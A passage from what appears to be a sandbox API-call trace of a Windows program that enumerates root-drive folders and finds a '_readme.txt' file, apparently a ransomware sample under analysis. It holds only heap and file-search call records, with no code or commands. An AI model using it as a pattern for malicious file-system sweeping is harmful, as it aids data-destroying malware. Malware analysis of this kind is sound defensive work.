lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x31e15a8 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f3c20 | out: hHeap=0x6e0000) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.427] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.427] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4780d860, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0146.427] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0146.427] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.428] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a9ab0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb0a9ab0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xfc) returned 0x3201db8 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e660 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31e15a8 | out: hHeap=0x6e0000) returned 1 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.428] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e698 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.428] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1aeb8bb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1aeb8bb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.428] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.428] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0146.428] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16c) returned 0x73bec0 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240960 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e660 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e698 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3201db8 | out: hHeap=0x6e0000) returned 1 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.429] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c70 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.429] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17fb5930, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408e8 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.429] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.429] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0146.429] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.430] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240708 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x214) returned 0x32426a8 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e698 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409b0 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409d8 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e660 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a00 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240938 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240960 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e6d0 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240988 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c70 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408e8 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x73bec0 | out: hHeap=0x6e0000) returned 1 [0146.430] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240708 | out: hHeap=0x6e0000) returned 1 [0146.430] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.431] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e9eeef0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1e9eeef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1e9eeef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.431] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e9eeef0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1e9eeef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1e9eeef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.431] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e6d0 [0146.431] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.431] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.431] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x3a65050 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x3a65050 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65050 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 1 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5f0 [0146.432] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.432] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5f0 | out: hHeap=0x6e0000) returned 